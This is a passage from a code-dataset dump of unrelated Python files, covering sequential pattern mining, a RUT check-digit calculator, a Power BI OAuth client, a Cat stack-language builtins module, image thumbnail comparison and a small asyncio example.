return True\n\n def Size(s):\n if type(s[0]) is list:\n return len(s)\n else:\n return 1\n\n def length(s):\n convert=lambda s:sum(s,[]) if type(s[0]) is list else copy.deepcopy(s)\n return len(convert(s))\n \n def Last_MIS_Less(s1,s2):\n temp_s1=convert(s1)\n temp_s2=convert(s2)\n s1first=temp_s1[0]\n s2first=temp_s2[0]\n MISfirsts1=MS[temp_s1[0]]\n MISlasts2=MS[temp_s2[-1]]\n firstS1=temp_s1.pop(0) #remove first\n if len(temp_s2) == 2 :\n secondlastS2=temp_s2.pop(0)\n else:\n secondlastS2=temp_s2.pop(-2)# remove last but 1\n if temp_s1==temp_s2 and MISlasts22: # just generate c1\n if type(s2[0]) is int:\n cand=copy.deepcopy(s2)\n cand.insert(0,s1[0])\n candlist.append(cand)\n \n\n\n else:\n first=copy.deepcopy(s1[0])\n if isinstance(first,list):item=first[0]\n else:item=first \n cand=copy.deepcopy(s2)\n cand[0].insert(0,item)\n candlist.append(cand)\n \n\n\n \n def DefaultJoin(s1,s2):\n temp_s1=convert(s1)\n temp_s2=convert(s2)\n firstS1=temp_s1.pop(0) #remove first\n lastS2=temp_s2.pop()#remove last \n if temp_s1==temp_s2 and abs(float(Lcount[firstS1]/N)-float((Lcount[lastS2]/N)))<=SDC:\n last=copy.deepcopy(s2[-1])\n if type(last) is list and len(last)==1:\n if type(s1[0]) is int: \n cand=[]\n cand.append(copy.deepcopy(s1))\n cand.append(copy.deepcopy(s2[-1]))\n candlist.append(cand)\n\n else: \n 
cand=copy.deepcopy(s1)+[copy.deepcopy(s2[-1])] \n candlist.append(cand)\n \n else:\n if type(s1[0]) is int: # add the last element at end of list\n if isinstance(last,list):\n item=last[-1]\n else:\n item=last\n\n cand=copy.deepcopy(s1)\n cand.append(item)\n candlist.append(cand) \n\n\n\n else:\n\n if isinstance(last,list):item=last[-1]\n else:item=last\n cand=copy.deepcopy(s1)\n cand[-1].append(item)\n candlist.append(cand)\n\n\n\n \n def FirstMISList(s1, s2): \n temp_s1 = convert(s1)\n temp_s2 = convert(s2)\n pop_temp_s1 = copy.deepcopy(temp_s1)\n pop_temp_s1.pop(1) #remove s1's 2nd element\n pop_temp_s2 = temp_s2[:-1] #remove last element from s1\n \n if pop_temp_s1 == pop_temp_s2 and MS[temp_s2[-1]]>= MS[temp_s1[0]] and abs(float(Lcount.get(temp_s2[-1])/N)- float(Lcount.get(temp_s1[1])/N)) <= SDC:#check if s1 without element at 2 and s2 without last element are the same\n \n if isinstance(s2[-1], list) and length(s2[-1]) == 1: #l is added at the end of the last element of s1 to form another candidate sequence c2.\n #if last element of s2 is a list and if its the only element in it \n #if s1 is a not a list of lists\n if isinstance(s1[-1], int): \n cand=[]\n cand.append(copy.deepcopy(s1)) \n cand.append(copy.deepcopy(s2[-1]))\n candlist.append(cand)\n \n \n \n else: #if s2 is a list\n cand=copy.deepcopy(s1)+[copy.deepcopy(s2[-1])] #if s2=[[10],[20]] add just the first element of s1 as list to s2 .\n candlist.append(cand)\n \n \n\n\n if length(s1) == 2 and Size(s1) == 2 and temp_s2[-1] > temp_s1[-1]: \n #check leng and size of s1 and the last item of s2 is greater than the last item of s1\n cand=copy.deepcopy(s1)\n cand[-1].extend(copy.deepcopy(s2[-1]))\n candlist.append(cand)\n \n\n elif (length(s1) == 2 and Size(s1) == 1 and temp_s2[-1] > temp_s1[-1]) or length(s1) > 2:\n \n\n\n if type(s1[-1]) is int:\n cand=copy.deepcopy(s1)\n cand.append(s2[-1])\n candlist.append(cand)\n \n \n\n else:\n last=copy.deepcopy(s2[-1])\n if isinstance(last,list):item=last[-1]\n else:item=last\n cand=copy.deepcopy(s1)\n cand[-1].append(item) \n candlist.append(cand) \n for s1 in F:\n for s2 in F: \n if checkIfFirstMISIsSmallest(s1, MS): \n FirstMISList(s1, s2)\n elif CheckLastMIS(s2,MS):\n Last_MIS_Less(s1,s2)\n\n else:\n DefaultJoin(s1,s2)\n \n duplicate=[]\n for i in range(0, len(candlist)-1):\n for j in range(i+1, len(candlist)-2):\n if candlist[i] == candlist[j]:\n duplicate.append(candlist[i])\n for i in duplicate:\n candlist.remove(i)\n \n for c in candlist:\n if not prune(c,MS,F):\n candlist.remove(c)\n return candlist\n\n\n# In[1157]:\n\n\nimport copy\ndef prune(c,MS,F):\n def MinMIS(s, MS):\n convert=lambda s2:sum(s2,[]) if type(s2[0]) is list else copy.deepcopy(s2) \n temp=convert(s)\n Min_MIS=float('inf')\n for item in temp:\n Min_MIS=min(Min_MIS,MS[item])\n return Min_MIS \n\n Min_MIS=MinMIS(c, MS)\n if isinstance(c[0],list):\n for I in range(len(c)):\n for item in range(len(c[I])):\n temp=copy.deepcopy(c) \n if len(c[I])==1:\n temp.remove(c[I])\n if len(temp)==1:temp=temp[0]\n else:\n temp[I].remove(c[I][item])\n temp_mis=MinMIS(temp, MS)\n if temp_mis==Min_MIS:\n if temp not in F:\n return False\n \n else:\n for i in range(len(c)):\n temp=copy.deepcopy(c)\n temp.remove(c[i])\n temp_mis=MinMIS(temp, MS)\n if temp_mis==Min_MIS:\n if temp not in F:\n return False\n return True\n\n\n# In[1158]:\n\n\ndef printOutput(k, F, count):\n file = open(\"result.txt\", \"a\")\n file.write(\"\\nNo of length :{} Frequent sequences: {}\\n\".format(k, len(F)))\n for cand in F:\n cand_string = list(str(cand))\n 
if isinstance(cand[-1],list):\n            cand_string[0] = '<'\n            cand_string[-1] = '>'\n        else:\n            cand_string[0] = '<{'\n            cand_string[-1] = '}>'\n        for i in range(0, len(cand_string)):\n            if(cand_string[i] == '['):\n                cand_string[i] = '{'\n            if(cand_string[i] == ']'):\n                cand_string[i] = '}'\n            if(cand_string[i] == ','):\n                if(cand_string[i-1] == '}'):\n                    cand_string[i] = ''\n                    cand_string[i+1] = ''\n        cand_string = ''.join(cand_string)\n        file.write(\"{} count: {}\\n\".format(cand_string, count[str(cand)]))\n\n\n# In[1159]:\n\n\nif __name__ =='__main__':main() \n\n","repo_name":"parth-code/MS-GSP","sub_path":"Code.py","file_name":"Code.py","file_ext":"py","file_size_in_byte":15138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29346341889","text":"numero = input(\"Enter your RUT without the check digit: \")\n\nlargo = len(numero)\n\nm = 1\n\nsuma = 0\n\nfor i in range(largo-1,-1,-1):\n\n    m = m + 1\n\n    suma = suma + int(numero[i])*m\n\n    if m == 7:\n\n        m = 1\n\nresto = suma % 11\n\ndv = 11 - resto\n\ndv = str(dv)\n\nif dv == \"11\":\n\n    dv = \"0\"\n\nif dv == \"10\":\n\n    dv = \"K\"\n\nprint(\"dv=\",dv)","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej5/hito1_ej5_d06060e39f26ddb9e212d98d09af3cf6.py","file_name":"hito1_ej5_d06060e39f26ddb9e212d98d09af3cf6.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"75041410167","text":"from typing import List\nfrom typing import Dict\nfrom typing import Union\n\nimport json\nimport msal\nimport time\nimport urllib\nimport random\nimport string\nimport pathlib\n\nfrom powerbi.session import PowerBiSession\n\n\nclass PowerBiAuth():\n\n    AUTHORITY_URL = 'https://login.microsoftonline.com/'\n    AUTH_ENDPOINT = '/oauth2/v2.0/authorize?'\n    TOKEN_ENDPOINT = '/oauth2/v2.0/token'\n\n    def __init__(\n        self,\n        client_id: str,\n        client_secret: str,\n        redirect_uri: str,\n        scope: List[str],\n        account_type: str = 'common',\n        credentials: str = None\n    ):\n        \"\"\"Initializes the `PowerBiAuth` Client.\n\n        ### Parameters\n        ----\n        client_id : str\n            The application Client ID assigned when\n            creating a new Microsoft App.\n\n        client_secret : str\n            The application Client Secret assigned when\n            creating a new Microsoft App.\n\n        redirect_uri : str\n            The application Redirect URI assigned when\n            creating a new Microsoft App.\n\n        scope : List[str]\n            The list of scopes you want the application\n            to have access to.\n\n        account_type : str (optional, Default='common')\n            The account type your application wants to\n            authenticate as.\n\n        credentials : str (optional, Default=None)\n            The file path to your local credential file.\n        \"\"\"\n\n        # lowercase letters used to build the random state string\n        letters = string.ascii_lowercase\n\n        self.credentials = credentials\n        self.token_dict = None\n\n        self.client_id = client_id\n        self.client_secret = client_secret\n        self.api_version = 'v1.0'\n        self.account_type = account_type\n        self.redirect_uri = redirect_uri\n\n        self.scope = scope\n        self.state = ''.join(random.choice(letters) for i in range(10))\n\n        self.access_token = None\n        self.refresh_token = None\n        self.graph_session = None\n        self.id_token = None\n\n        self.graph_url = self.AUTHORITY_URL + self.account_type + self.AUTH_ENDPOINT\n\n        # Initialize the Credential App.\n        self.client_app = msal.ConfidentialClientApplication(\n            client_id=self.client_id,\n            authority=self.AUTHORITY_URL + self.account_type,\n            client_credential=self.client_secret\n        )\n\n    def _state(self, action: str, 
token_dict: dict = None) -> bool:\n \"\"\"Sets the session state for the Client Library.\n\n ### Parameters\n ----\n action : str\n Defines what action to take when determining the state. Either\n `load` or `save`.\n\n token_dict : dict, optional\n If the state is defined as `save` then pass through the\n token dictionary you want to save, by default None.\n\n ### Returns\n ----\n bool :\n If the state action was successful, then returns `True`\n otherwise it returns `False`.\n \"\"\"\n\n # Determine if the Credentials file exists.\n does_exists = pathlib.Path(self.credentials).exists()\n\n # If it exists and we are loading it then proceed.\n if does_exists and action == 'load':\n\n # Load the file.\n with open(file=self.credentials, mode='r') as state_file:\n credentials = json.load(fp=state_file)\n\n # Grab the Token if it exists.\n if 'refresh_token' in credentials:\n\n self.refresh_token = credentials['refresh_token']\n self.access_token = credentials['access_token']\n self.id_token = credentials['id_token']\n self.token_dict = credentials\n\n return True\n\n else:\n return False\n\n # If we are saving the state then open the file and dump the dictionary.\n elif action == 'save':\n\n token_dict['expires_in'] = time.time(\n ) + int(token_dict['expires_in'])\n token_dict['ext_expires_in'] = time.time(\n ) + int(token_dict['ext_expires_in'])\n\n self.refresh_token = token_dict['refresh_token']\n self.access_token = token_dict['access_token']\n self.id_token = token_dict['id_token']\n self.token_dict = token_dict\n\n with open(file=self.credentials, mode='w+') as state_file:\n json.dump(obj=token_dict, fp=state_file, indent=2)\n\n def _token_seconds(self, token_type: str = 'access_token') -> int:\n \"\"\"Determines time till expiration for a token.\n\n Return the number of seconds until the current access token or refresh token\n will expire. The default value is access token because this is the most commonly used\n token during requests.\n\n ### Parameters\n ----\n token_type : str (optional, Default='access_token')\n The type of token you would like to determine lifespan for.\n Possible values are ['access_token', 'refresh_token'].\n\n ### Returns\n ----\n int : \n The number of seconds till expiration.\n \"\"\"\n\n # if needed check the access token.\n if token_type == 'access_token':\n\n # if the time to expiration is less than or equal to 0, return 0.\n if not self.access_token or (time.time() + 60 >= self.token_dict['expires_in']):\n return 0\n\n # else return the number of seconds until expiration.\n token_exp = int(self.token_dict['expires_in'] - time.time() - 60)\n\n # if needed check the refresh token.\n elif token_type == 'refresh_token':\n\n # if the time to expiration is less than or equal to 0, return 0.\n if not self.refresh_token or (time.time() + 60 >= self.token_dict['ext_expires_in']):\n return 0\n\n # else return the number of seconds until expiration.\n token_exp = int(\n self.token_dict['ext_expires_in'] - time.time() - 60\n )\n\n return token_exp\n\n def _token_validation(self, nseconds: int = 60):\n \"\"\"Checks if a token is valid.\n\n Verify the current access token is valid for at least N seconds, and\n if not then attempt to refresh it. Can be used to assure a valid token\n before making a call to the TD Ameritrade API.\n\n ### Parameters\n ----\n nseconds {int} -- The minimum number of seconds the token has to be\n valid for before attempting to get a refresh token. 
(default: {60})\n        \"\"\"\n\n        if self._token_seconds(token_type='access_token') < nseconds:\n            self.grab_refresh_token()\n\n    def _silent_sso(self) -> bool:\n        \"\"\"Attempts a Silent Authentication using the Access Token and Refresh Token.\n\n        ### Returns\n        ----\n        bool :\n            `True` if it was successful and `False` if it failed.\n        \"\"\"\n\n        # if the current access token is not expired then we are still authenticated.\n        if self._token_seconds(token_type='access_token') > 0:\n            return True\n\n        # if the current access token is expired then try and refresh access token.\n        elif self.refresh_token and self.grab_refresh_token():\n            return True\n\n        # More than likely a first time login, so can't do silent authentication.\n        return False\n\n    def login(self) -> None:\n        \"\"\"Logs the user into the session.\"\"\"\n\n        # Load the State.\n        self._state(action='load')\n\n        # Try a Silent SSO First.\n        if self._silent_sso():\n\n            # Set the Session.\n            self.graph_session = PowerBiSession(client=self)\n\n            return True\n\n        else:\n\n            # Build the URL.\n            url = self.authorization_url()\n\n            # ask the user to go to the URL provided; they will be prompted to authenticate themselves.\n            print('Please go to the URL provided to authorize your account: {}'.format(url))\n\n            # ask the user to take the final URL after authentication and paste here so we can parse.\n            my_response = input('Paste the full URL redirect here: ')\n\n            # store the redirect URL\n            self._redirect_code = my_response\n\n            # this will complete the final part of the authentication process.\n            self.grab_access_token()\n\n            # Set the session.\n            self.power_bi_session = PowerBiSession(client=self)\n\n    def authorization_url(self) -> str:\n        \"\"\"Builds the authorization URL used to get an Authorization Code.\n\n        ### Returns\n        ----\n        str :\n            The full authorization url.\n        \"\"\"\n\n        auth_url = {\n            'response_type':'code',\n            'client_id': self.client_id,\n            'redirect_uri': self.redirect_uri,\n            'resource':'https://analysis.windows.net/powerbi/api'\n        }\n\n        # Build the Auth URL.\n        auth_url = self.client_app.get_authorization_request_url(\n            scopes=self.scope,\n            state=self.state,\n            redirect_uri=self.redirect_uri\n        )\n\n        return auth_url\n\n    def grab_access_token(self) -> Dict:\n        \"\"\"Exchanges a code for an Access Token.\n\n        ### Returns\n        ----\n        Dict : \n            A dictionary containing a new access token and refresh token.\n        \"\"\"\n\n        # Parse the Code.\n        query_dict = urllib.parse.parse_qs(self._redirect_code)\n\n        # Grab the Code.\n        code = query_dict[self.redirect_uri + \"?code\"]\n\n        # Grab the Token.\n        token_dict = self.client_app.acquire_token_by_authorization_code(\n            code=code,\n            scopes=self.scope,\n            redirect_uri=self.redirect_uri\n        )\n\n        # Save the token dict.\n        self._state(\n            action='save',\n            token_dict=token_dict\n        )\n\n        return token_dict\n\n    def grab_refresh_token(self) -> Dict:\n        \"\"\"Grabs a new access token using a refresh token.\n\n        ### Returns\n        ----\n        Dict :\n            A token dictionary with a new access token.\n        \"\"\"\n\n        # Grab a new token using our refresh token.\n        token_dict = self.client_app.acquire_token_by_refresh_token(\n            refresh_token=self.refresh_token,\n            scopes=self.scope\n        )\n\n        if 'error' in token_dict:\n            print(token_dict)\n            raise PermissionError(\n                \"Permissions not authorized, delete json file and run again.\"\n            )\n\n        # Save the Token.\n        self._state(\n            action='save',\n            token_dict=token_dict\n        )\n\n        return 
token_dict\n","repo_name":"areed1192/power-bi-python-api","sub_path":"powerbi/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":10615,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"77"} +{"seq_id":"39391404446","text":"import pandas as pd\n\n# Read the Excel file\ntry:\n df = pd.read_excel('book1.xlsx')\n\n # Extract the data from specific rows\n timestamps = df.iloc[1::2, 0].reset_index(drop=True)\n text = df.iloc[::2, 0].reset_index(drop=True)\n\n # Create a new DataFrame with the extracted data\n new_df = pd.DataFrame({'Time': timestamps, 'Text': text})\n\n # Save the new DataFrame to a CSV file\n new_df.to_csv('output_file.csv', index=False)\n\nexcept Exception as e:\n print(e)\n print('Error reading/writing file.')","repo_name":"ZafeerMahmood/Cv2Learning","sub_path":"ExelScriptForDataFormating.py","file_name":"ExelScriptForDataFormating.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"1937985576","text":"class Solution:\n def treeToDoublyList(self, root: 'Node') -> 'Node':\n if not root:\n return None\n dummy = Node(-1)\n pre = dummy\n stack = []\n while stack or root:\n while root:\n stack.append(root)\n root = root.left\n cur = stack.pop()\n pre.right = cur\n cur.left = pre\n pre = cur\n root = cur.right\n head = dummy.right\n head.left = pre\n pre.right = head\n return head","repo_name":"zengtian006/LeetCode","sub_path":"Tree/Leetcode 426. Convert Binary Search Tree to Sorted Doubly Linked List.py","file_name":"Leetcode 426. Convert Binary Search Tree to Sorted Doubly Linked List.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"77"} +{"seq_id":"21888198409","text":"\"\"\"\n\n Builtin function definitions.\n\n\n Note that many words are defined like:\n\n @define('int')\n def _int(...):\n ...\n\n with the leading underscore so that we don't overwrite builtins.\n\"\"\"\n\nimport sys\n\nfrom cat.namespace import define\n\n\n@define('+')\n@define('add')\n@define('str_cat')\ndef add(cat):\n \"\"\"\n add : (nbr nbr -> nbr)\n\n desc:\n adds top two numbers on the stack returning the sum on top of the stack\n Note that if instead of numbers one has other objects such as strings\n or lists, they will be concatenated.\n\n tags:\n level0,mathematics\n \"\"\"\n a, b = cat.pop_2()\n return cat.push(b + a)\n\n\n@define('-')\ndef sub(cat):\n \"\"\"\n sub : (nbr nbr -> nbr)\n\n desc:\n subtracts the number at [0] from that at [-1] returning\n the difference to the top of the stack.\n\n tags:\n level0,mathematics\n \"\"\"\n a, b = cat.pop_2()\n cat.push(b - a)\n\n\n@define('*')\ndef mul(cat):\n \"\"\"\n mul : (nbr nbr -> nbr)\n\n desc:\n multiplies together the top two numbers on the stack. Result is placed\n on top of the stack. 
Note if the lower \"number\" is a string or a list\n it is replicated according to the standard Python rules.\n\n tags:\n level0,mathematics\n \"\"\"\n a, b = cat.pop_2()\n cat.push(a * b)\n\n\n@define('/')\ndef div(cat):\n \"\"\"\n div : (nbr nbr -> nbr)\n\n desc:\n The number at [0] is divided into the number at [-1] and the\n quotient is pushed onto the stack.\n\n tags:\n level0,mathematics\n \"\"\"\n a, b = cat.pop_2()\n cat.push(b / a)\n\n\n@define('+rot')\ndef _rotUp(stack):\n '''\n +rot : (any:a any:b any:c -> any:c any:a any:b)\n\n desc:\n rotates the top three elements upward one position circularly\n\n tags:\n level0,stack\n '''\n if stack.length() < 3:\n raise Exception(\"+rot: Expect at least three elements on the stack\")\n\n t, m, b = stack.pop_n(3)\n stack.push((t, b, m), multi=True)\n\n\n@define('-rot')\ndef _rotDown(stack):\n '''\n -rot : (any:a any:b any:c -> any:b any:c any:a)\n\n desc:\n rotates the top three elements downward one position circularly\n\n tags:\n level0,stack\n '''\n if stack.length() < 3:\n raise Exception(\"-rot: Expect at least three elements on the stack\")\n\n t, m, b = stack.pop_n(3)\n stack.push((m, t, b), multi=True)\n\n\n@define('not')\ndef _not(stack):\n '''\n not : (bool -> bool)\n\n desc:\n returns True if the top value on the stack is False and vice versa\n\n tags:\n level0,boolean\n '''\n stack.stack[-1] = not stack.stack[-1]\n\n\n@define('while')\ndef _while(stack):\n '''\n while : (func func:test -> any|none)\n\n desc:\n executes a block of code (function) repeatedly until the condition returns false\n Example: func test while\n\n tags:\n level1,control\n '''\n b, f = stack.pop_2()\n\n while (stack.eval(b), stack.pop())[1]:\n stack.eval(f)\n\n\n@define('list')\ndef _list(cat):\n '''\n list : ([...] 
-> list)\n\n    desc:\n        creates a list from a function\n\n    tags:\n        level0,lists\n    '''\n\n    func = cat.pop()\n    with cat.new_stack():\n        cat.eval(func)\n        lst = cat.to_list()\n    cat.push(lst)\n\n\n@define('#types')\ndef _type(stack):\n    '''\n    #types : (-> list)\n\n    desc:\n        prints a list of types represented by elements on the stack\n        in the same order as the element on the stack with the deepest\n        item first and the top item last\n\n    tags:\n        custom,types,stack\n    '''\n    typeList = []\n\n    for item in stack.stack:\n        typeList.append(type(item))\n\n    stack.output(str(typeList), 'green')\n\n\n@define('int')\ndef _int(cat):\n    '''\n    int : (obj -> int)\n\n    desc:\n        casts the object on top of the stack to an integer\n\n    tags:\n        level1,math,conversion\n    '''\n    cat.stack.push(int(cat.stack.pop()))\n\n\n@define('float')\ndef _float(cat):\n    '''\n    float : (obj -> float)\n\n    desc:\n        casts the object on top of the stack to a floating point number\n\n    tags:\n        level1,math,conversion\n    '''\n    cat.stack.push(float(cat.stack.pop()))\n\n\n@define('#pdb')\ndef _pdb(cat):\n    '''\n    #pdb : (-- -> --)\n\n    desc:\n        toggles the pdb flag in the REPL\n\n    tags:\n        custom,system,debugging\n    '''\n    cat.toggle_pdb()\n    #toggle_pdb()\n\n\n@define('and')\ndef _and(stack):\n    '''\n    and : (bool bool -> bool)\n\n    desc:\n        returns True if both of the top two values on the stack are True\n\n    tags:\n        level0,boolean\n    '''\n    a, b = stack.pop_2()\n    stack.push(a and b)\n\n\n@define('or')\ndef _or(stack):\n    '''\n    or : (bool bool -> bool)\n\n    desc:\n        returns True if either of the top two values on the stack are True\n\n    tags:\n        level0,boolean\n    '''\n    a, b = stack.pop_2()\n    stack.push(a or b)\n\n\n@define('#import')\ndef _import(stack):\n    '''\n    #import : (string:module_name -> --)\n\n    desc:\n        imports the named module for use by the program\n        Note: members of the module are accessed with this notation: module.member\n        parameters must precede the function call as a list with arguments in the order\n        required by the function. E.g. ([base expt] list math.pow -> base^expt)\n        Example: 'math #import\n                 'os #import\n                 'localModule #import\n\n    tags:\n        custom,module,import\n    '''\n    what = stack.pop()\n\n    if isinstance(what, basestring):\n        sys.modules[what] = __import__(what)\n\n    else:\n        raise Exception(\"#import The module name must be a string\")\n\n\n@define('#trace')\ndef _trace(cat):\n    '''\n    #trace: (-- -> --)\n\n    desc:\n        toggles the global tracing flag to enable simple tracing of function\n        execution.\n\n    tags:\n        custom,debugging\n    '''\n    # This will fail. Needs fixing.\n    cat.toggle_trace()\n\n\n@define('>>')\ndef _rightShift(stack):\n    '''\n    >> : (int:base int:n -> int)\n\n    desc:\n        performs a right shift of n bits on a base integer\n\n    tags:\n        level0,math\n    '''\n    n, val = stack.pop_2()\n    stack.push(int(val) >> n)\n\n\n@define('<<')\ndef _leftShift(stack):\n    \"\"\"\n    << : (int:base int:n -> int)\n\n    desc:\n        performs a left shift of n bits on a base integer\n\n    tags:\n        level0,math\n    \"\"\"\n    n, val = stack.pop_2()\n    stack.push(int(val) << n)\n\n\n@define('divmod')\n@define('/%')\n@define('%/') # Are you sure you've got enough aliases there?\ndef _divmod(stack):\n    '''\n    divmod : (nbr nbr -> nbr nbr)\n    /% : (nbr nbr -> nbr nbr)\n\n    desc:\n        applies divmod function to top two members on stack. Number on top\n        is the modulus. 
Returns quotient, remainder on stack (remainder on top).\n\n    tags:\n        level0,mathematics\n    '''\n    a, b = stack.pop_2()\n    stack.push(divmod(b, a), multi=True)\n\n\n@define('inc')\n@define('++')\ndef inc(cat):\n    '''\n    inc : (nbr -> nbr)\n\n    desc:\n        increments the number on top of the stack by 1\n\n    tags:\n        level0,mathematics\n    '''\n    cat.stack.push(cat.stack.pop() + 1)\n\n\n@define('dec')\n@define('--')\ndef dec(cat):\n    '''\n    dec : (nbr -> nbr)\n\n    desc:\n        decrements the number on top of the stack by 1\n\n    tags:\n        level0,mathematics\n    '''\n    cat.stack.push(cat.stack.pop() - 1)\n\n\n@define('mod')\n@define('%')\ndef mod(cat):\n    '''\n    mod : (nbr nbr -> nbr)\n\n    desc:\n        applies modulus function to top two members on stack. Number at [0]\n        is the modulus.\n\n    tags:\n        level0,mathematics\n    '''\n    a, b = cat.stack.pop_2()\n    cat.stack.push(b % a)\n\n\n@define('pwr')\n@define('**')\ndef pwr(stack):\n    '''\n    pwr : (nbr:base nbr:expt -> nbr)\n\n    desc:\n        base**expt is pushed onto the stack\n\n    tags:\n        level0,math\n    '''\n    expt, base = stack.pop_2()\n\n    if isinstance(base, basestring):\n        base = eval(base)\n\n    if not isinstance(base, (int, long, float)):\n        raise ValueError(\"pwr: The base must be a number\")\n\n    if isinstance(expt, basestring):\n        expt = eval(expt)\n\n    if not isinstance(expt, (int, long, float)):\n        raise ValueError(\"pwr: The exponent must be a number\")\n\n    stack.push(base ** expt)\n\n\n@define('round')\ndef _round(stack):\n    '''\n    round : (float:nbr int:dp -> float:nbr)\n\n    desc:\n        rounds the floating point number at [-1] to the number of\n        decimal places specified by the integer at [0]\n\n    tags:\n        level1,mathematics\n    '''\n    dp, nbr = stack.pop_2()\n\n    if not isinstance(nbr, float):\n        nbr = float(nbr)\n\n    dp = int(dp)\n\n    stack.push(round(nbr, dp))\n\n\n@define('abs')\ndef _abs(stack):\n    '''\n    abs : (nbr -> nbr)\n\n    desc:\n        replaces the number on top of the stack with its absolute value\n\n    tags:\n        level1,mathematics\n    '''\n    nbr = stack.pop()\n\n    if isinstance(nbr, basestring):\n        nbr = eval(nbr)\n\n    if isinstance(nbr, (int, long, float)):\n        stack.push(abs(nbr))\n\n    else:\n        raise ValueError(\"abs: Argument is not a number\")\n\n\n@define('all')\ndef _all(stack):\n    '''\n    all : (list -> bool)\n\n    desc:\n        returns true on top of the stack if all of the elements of the\n        list on top of the stack are true\n\n    tags:\n        custom,mathematics\n    '''\n    stack.push(all(stack.pop_list()))\n\n\n@define('any')\ndef _any(stack):\n    '''\n    any : (list -> bool)\n\n    desc:\n        Returns true on top of the stack if any element of the list\n        on top of the stack is true\n\n    tags:\n        custom,lists\n    '''\n    stack.push(any(stack.pop_list()))\n\n\n@define('chr')\ndef _chr(stack):\n    '''\n    chr : (int -> string)\n\n    desc:\n        converts the integer on top of the stack to a single character string\n\n    tags:\n        custom,string\n    '''\n    val = stack.pop()\n\n    if isinstance(val, str) and val.isdigit():\n        val = int(val)\n\n    if isinstance(val, float):\n        val = int(val)\n\n    if isinstance(val, (int, long)):\n        stack.push(chr(val))\n\n    else:\n        raise ValueError(\"chr: Cannot convert argument to an integer\")\n\n\n@define('enum')\ndef _enum(stack):\n    '''\n    enum : (list int:start -> list)\n\n    desc:\n        returns an enumerated list on top of the stack based on the\n        starting int at [0] and the list at [-1] on the stack\n\n    tags:\n        custom,lists\n    '''\n    start, lst = stack.pop_2()\n\n    if isinstance(start, (str, float)):\n        start = int(start)\n\n    if not isinstance(start, (int, long)):\n        raise ValueError(\"enum: Starting value must be an integer\")\n\n    if isinstance(lst, 
str):\n        lst = eval(lst)\n\n    if not isinstance(lst, (list, tuple)):\n        raise ValueError(\"enum: The list must be an iterable or convertible to one\")\n\n    stack.push([[x, y] for x, y in enumerate(lst, start)])\n\n\n@define('hash')\ndef _hash(stack):\n    '''\n    hash : (any -> int)\n\n    desc:\n        pushes the hash value of the object on top of the stack onto the stack\n\n    tags:\n        custom,math\n    '''\n    stack.push(hash(stack.pop()))\n\n\n@define('id')\ndef _id(stack):\n    '''\n    id : (any -> any int:id)\n\n    desc:\n        calculates a unique integer id for the object on top of\n        the stack and then pushes this id onto the stack. This id\n        is unique as long as the session lasts. A new session will\n        produce a different id.\n\n    tags:\n        custom,math\n    '''\n    stack.push(id(stack.peek()))\n\n\n@define('ord')\ndef _ord(stack):\n    '''\n    ord : (string:chr -> int)\n\n    desc:\n        takes the single character string (or first character of a longer string)\n        and pushes the integer code for that character onto the stack\n\n    tags:\n        custom,string,math\n    '''\n    obj = stack.pop()\n\n    if isinstance(obj, (list, tuple)):\n        obj = obj[0]\n\n    if not isinstance(obj, str):\n        obj = str(obj)\n\n    stack.push(ord(obj[0]))\n\n\n@define('sort')\ndef _sort(stack):\n    '''\n    sort : (list -> list)\n\n    desc:\n        sorts the list on top of the stack\n\n    tags:\n        custom,sort,list\n    '''\n    stack.push(sorted(stack.pop()))\n","repo_name":"AndrewNelis/catlang","sub_path":"defs/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":12107,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"77"} +{"seq_id":"38831437908","text":"\"\"\"\nCreated on Tue Apr 23 13:08:33 2019\n\n@author: dan\n\"\"\"\n\nfrom PIL import Image, ImageOps\n\nSIZE = 16 \ne = 2.78\nMIN = 0.12\n\nclass NotAnImage(ValueError):\n    pass\n\ndef σ(x):\n    return 1 / (1 + e**(-x))\n\ndef compare(img1, img2):\n    D = []\n    for x in range(SIZE)[SIZE//4:-SIZE//4]:\n        for y in range(SIZE)[SIZE//4:-SIZE//4]:\n            p1 = img1.getpixel((x,y))\n            p2 = img2.getpixel((x,y))\n            a = σ(p1 / 255)\n            b = σ(p2 / 255)\n            D += [(a-b)**2]\n#    print(D)\n    return sum(D)**0.5\n\ndef getthumb(filename):\n    try:\n        return ImageOps.grayscale(Image.open(filename).resize(size = (SIZE,SIZE), resample = Image.HAMMING))\n    except OSError:\n        raise NotAnImage()\n\nif __name__ == '__main__':\n    try:\n        import sys\n        assert len(sys.argv) > 2\n        img1, img2 = sys.argv[1], sys.argv[2]\n        i1 = getthumb(img1)\n        i2 = getthumb(img2)\n        x = compare(i1, i2)\n        print(\"%s <=> %s (%s) %s\" % (img1, img2, round(x,2), \"yes\" if x < 0.07 else \"similar\" if x < 0.7 else \"no\"))\n    except AssertionError:\n        print(\"Usage\")\n    except FileNotFoundError:\n        print(\"FileNotFound\", file=sys.stderr)\n        exit(2)","repo_name":"daniel-kurushin/arm-quantum","sub_path":"old/camera/compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"10573630706","text":"import asyncio\nfrom util import async_timed\n\n\n# Run two coroutines concurrently and see that everything together finishes in 3 seconds.\n\n@async_timed()\nasync def delay(delay_seconds: int) -> int:\n    print(f\"Sleeping for {delay_seconds} s\")\n    await asyncio.sleep(delay_seconds)\n    print(f\"sleep of {delay_seconds} s has finished\")\n    return delay_seconds\n\n\n@async_timed()\nasync def main():\n    task_one = asyncio.create_task(delay(2))\n    task_two = asyncio.create_task(delay(3))\n\n    await task_one\n    await 
